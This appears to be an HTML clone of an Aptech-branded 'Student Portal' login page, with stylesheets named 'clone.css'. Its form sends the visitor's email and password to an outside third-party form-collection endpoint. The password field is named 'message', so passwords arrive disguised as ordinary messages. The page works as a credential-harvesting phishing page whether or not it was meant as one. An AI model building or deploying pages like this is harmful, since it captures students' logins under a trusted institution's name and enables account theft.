<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Login Form</title>
    <link rel="stylesheet" href="assets/css/clone.css" />
    <link rel="stylesheet" href="assets/css/responsive.css" />
    <!-- <link rel="stylesheet" href="assets//css/ipad.css"> -->
    <link rel="shortcut icon" href="img/LOGO 2.png" type="image/x-icon" />
  </head>
  <body>
    <div class="container">
      <div class="box">
        <div class="loginheading">
          <h1 id="loginKiHeading">Login</h1>
          <h1 id="stuportalheadResponsive">Student Portal</h1>
        </div>
        <div class="line">
          <hr id="greyline" style="width: 110px; border: 1px solid gray" />
        </div>
        <form   action="https://formspree.io/f/mgvkjyaj"
  method="POST">
        <div class="formInput">
          <input type="email" name="email" id="emailinput"  name="" id="" />
          <p id="youremailline">Your Email</p>
        </div>
        <div class="formpasswordinput">
          <input type="password"  name="message" id="yourPasswordinput" />
          <p id="yourpasswordine">Password</p>
        </div>
        <div class="loginbtn">
          
            <button type="submit" id="loginBtn">Login</button></a>
          </form>
          <a
            style="list-style: none; text-decoration: none"
            href="forgetpassword.html"
            ><p id="fPasswordResponsive" style="color: #f7b205">
              Forget Password
            </p></a
          >
        </div>
        <div class="forgetPassword">
          <a
            style="list-style: none; text-decoration: none"
            href="forgetpassword.html"
            ><p id="fPassword" style="color: #f7b205">Forget Password</p></a
          >
        </div>
      </div>
      <div class="logobox">
        <div class="logoimg">
          <img id="logoImageAptech" src="img/LOGO 2.png" alt="" />
        </div>
        <div class="studentportalheading">
          <h1 id="stuportalhead">Student Portal</h1>
        </div>
      </div>
    </div>
  </body>
</html>
